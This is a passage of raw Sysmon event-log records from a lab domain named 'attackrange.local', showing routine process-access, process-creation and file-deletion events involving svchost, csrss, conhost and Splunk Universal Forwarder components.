Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440463Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.909{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440462Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.909{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440461Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.909{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440460Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.909{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440459Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440458Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440457Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440456Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440455Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440454Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0255-6088-C028-00000000BA01}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440453Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.908{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0255-6088-C028-00000000BA01}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440452Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.907{42DC5269-0255-6088-C028-00000000BA01}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440451Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.894{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BD36A945798865B4631AE0AB92C30E3,SHA256=074EB6410A16A5FEF1AFDE99B310617B8FF90CDF261B76406C7AE06E3D9F6A07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291580Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:49.522{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5EF481C17043F29775407C49A8AA1F,SHA256=F23C53FCDF6D2849A8DE6F88F556E66714EE800B3B23529A611C91AD3B90A5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440450Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.727{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70214DC671AFEB30BCC216A6CC03C81C,SHA256=3BFFFFBD26202A524DE428050845A1AD6B2C6E1D3467A335FF00B5FBDFF242E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440449Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.536{42DC5269-0255-6088-BF28-00000000BA01}55645032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440448Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.398{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0255-6088-BF28-00000000BA01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440447Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440446Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440445Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440444Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440443Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440442Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440441Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440440Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.397{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440439Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.396{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440438Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.396{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0255-6088-BF28-00000000BA01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440437Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.396{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0255-6088-BF28-00000000BA01}5564C:\Program 